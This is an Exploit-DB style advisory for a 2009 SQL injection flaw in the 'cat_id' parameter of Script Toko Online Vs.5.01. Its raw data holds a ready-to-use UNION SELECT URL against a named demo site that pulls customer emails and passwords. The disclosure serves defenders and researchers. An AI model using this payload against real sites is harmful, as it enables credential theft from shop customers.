Script Toko Online Vs.5.01 SQL Injection Vulnerability

vendor:

Script Toko Online

by:

k1n9k0ng

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Script Toko Online

Affected Version From: Script Toko Online Vs.5.01

Affected Version To: Script Toko Online Vs.5.01

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Script Toko Online Vs.5.01 SQL Injection Vulnerability

A SQL injection vulnerability exists in Script Toko Online Vs.5.01, which allows an attacker to execute arbitrary SQL commands via the 'cat_id' parameter in the 'shop_display_products.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Script Toko Online Vs.5.01
Scripts site    : http://www.gempar.com/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*

# milw0rm.com [2009-01-26]